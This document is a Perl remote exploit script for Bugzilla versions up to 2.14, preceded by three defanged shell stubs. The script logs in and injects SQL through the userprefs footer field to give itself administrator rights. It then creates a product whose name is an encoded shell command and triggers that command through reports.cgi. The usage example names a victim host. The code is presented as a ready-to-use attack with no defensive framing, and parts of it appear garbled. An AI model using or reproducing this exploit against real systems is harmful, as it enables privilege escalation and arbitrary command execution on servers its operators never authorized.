#!/bin/sh echo DEFANGED.134391 exit #!/bin/sh echo DEFANGED.135798 exit #!/bin/sh echo DEFANGED.134392 exit #!/usr/bin/perl # Bugzilla <= 2.14 remote exploit - funkysh@sm.pl # first unpublished release - 13/01/2001 # checked with version 2.12 - 08/05/2001 # checked with version 2.14 - 10/09/2001 sub create_cmd { $cmd = ";" . $_[0]; $cmd =~ s/\//`echo -e "\\057"`/gs; $cmd = $cmd . "|"; if (length($cmd) > 64) { die ("created cmd string is longer than 64 chars, sorry.\n"); } $cmd =~ s/([ -~])/sprintf ("%%%x", ord($1))/ge; return $cmd } sub check_perm { open (RES, "lynx -source \"$host/userprefs.cgi?Bugzilla_login=$login&Bugzilla_password=$password&bank=permissions\"|"); while ($output = ) { chomp($output); if ($output =~ /

Can/) { if ($output =~ /edit components/) { $perm = 1; } $output =~ s/\

/\* /gs; print (" $output\n"); } } return $perm; } $perm = 0; $done = 0; $superusergroupset = "9223372036854775807"; if (@ARGV < 4) { die ("usage: $0 \n", " e.g.: $0 http://victim.com/bugzilla me\@email.com secret \"touch /tmp/heh\"\n"); } ($host, $login, $password, $cmd) = (@ARGV); print ("=> checking permissions\n"); if (! check_perm()) { print ("=> unsufficient groupset, trying to become bugzilla administrator\n"); open (RES, "lynx -source \"$host/userprefs.cgi?Bugzilla_login=$login&Bugzilla_password=$password&bank=footer&dosave=1&mybugslink=1%27%20%2cgroupset=%27$superusergroupset\"|"); } if (! $perm) { if (! check_perm()) { die ("=> changing groupset failed\n"); } } print ("=> permissions ok, creating cmd-product "); $cmd = (create_cmd($cmd)); open (RES, "lynx -source \"$host/editproducts.cgi?Bugzilla_login=$login&Bugzilla_password=$password&version=unspecified&product=$cmd&action=new\"|"); while ($output = ) { chomp($output); if ($output =~ /OK, done./) { print ("[ok]\n"); $done = 1; } } if (! $done) { die ("[failed]\n"); } print ("=> trying to execute cmd on remote host\n"); open (RES, "lynx -source \"$host/reports.cgi?output=show_chart&product=$cmd&datasets=1\"|"); exit(0);